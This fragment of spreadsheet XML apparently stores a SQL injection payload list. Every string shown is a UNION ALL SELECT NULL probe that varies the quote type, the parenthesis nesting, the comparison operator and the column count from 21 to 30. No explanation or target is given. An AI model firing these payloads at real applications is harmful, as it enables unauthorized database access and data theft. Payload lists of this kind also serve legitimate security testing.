    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'XeWG' = 'XeWG</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'CaBb' = 'CaBb</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'OmjF' = 'OmjF</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'nGoz' = 'nGoz</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'BwRr' = 'BwRr</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'JciW' = 'JciW</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'oOdJ' = 'oOdJ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'tWlu' = 'tWlu</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'BOKh' = 'BOKh</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'KalH' = 'KalH</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'nvbd' = 'nvbd</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'Kexp' = 'Kexp</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'caLx' = 'caLx</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'voRW' = 'voRW</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'fGWX' = 'fGWX</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'bAah' = 'bAah</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'hJtU' = 'hJtU</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'DHqf' = 'DHqf</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'hMcG' = 'hMcG</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'xtBD' = 'xtBD</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'gPXO' LIKE 'gPXO</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'NwiO' LIKE 'NwiO</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'uYBP' LIKE 'uYBP</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'Rxyn' LIKE 'Rxyn</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'pzdP' LIKE 'pzdP</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'QhKB' LIKE 'QhKB</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'ZWVc' LIKE 'ZWVc</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'NpMy' LIKE 'NpMy</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'eHyr' LIKE 'eHyr</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'oQjT' LIKE 'oQjT</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'gbiO' LIKE 'gbiO</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'znEV' LIKE 'znEV</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'Xpxd' LIKE 'Xpxd</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'gALo' LIKE 'gALo</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'ADjB' LIKE 'ADjB</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'vbad' LIKE 'vbad</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'RavP' LIKE 'RavP</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'qean' LIKE 'qean</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'BCTe' LIKE 'BCTe</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'hvxd' LIKE 'hvxd</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'RVkr' LIKE 'RVkr</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'Gfud' LIKE 'Gfud</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'iZXX' LIKE 'iZXX</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'pvfo' LIKE 'pvfo</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'dWQm' LIKE 'dWQm</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'nDzU' LIKE 'nDzU</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'YRJL' LIKE 'YRJL</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'Gczi' LIKE 'Gczi</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'TBfD' LIKE 'TBfD</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'Nnxb' LIKE 'Nnxb</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'eDhy' LIKE 'eDhy</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'kJAL' LIKE 'kJAL</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'ZDsR' LIKE 'ZDsR</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'gkBF' LIKE 'gkBF</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'DwxY' LIKE 'DwxY</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'UEoP' LIKE 'UEoP</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'VJhB' LIKE 'VJhB</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'LuLs' LIKE 'LuLs</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'yuhv' LIKE 'yuhv</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'xUto' LIKE 'xUto</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "Ffes" = "Ffes</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "wwar" = "wwar</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "omPX" = "omPX</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "BXFk" = "BXFk</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "meZy" = "meZy</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "cmzh" = "cmzh</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "JucD" = "JucD</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "CkSV" = "CkSV</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "spUc" = "spUc</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "fnpC" = "fnpC</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "kUtA" = "kUtA</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "niuE" = "niuE</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "Fblj" = "Fblj</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "jroF" = "jroF</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "aXbg" = "aXbg</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "CZUc" = "CZUc</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "WltS" = "WltS</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "JNrE" = "JNrE</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "ctNP" = "ctNP</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "zKxe" = "zKxe</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "nFmg" = "nFmg</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "HaRh" = "HaRh</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "kkff" = "kkff</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "nOJA" = "nOJA</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "SBQy" = "SBQy</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "ojQK" = "ojQK</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "pYZj" = "pYZj</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "jdjj" = "jdjj</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "ESQY" = "ESQY</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "viWG" = "viWG</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "yTZm" = "yTZm</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "MrGD" = "MrGD</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "aIpg" = "aIpg</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "QSjJ" = "QSjJ</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "yukn" = "yukn</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "QbGj" = "QbGj</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "VzTf" = "VzTf</t>
  </si>
  <si>
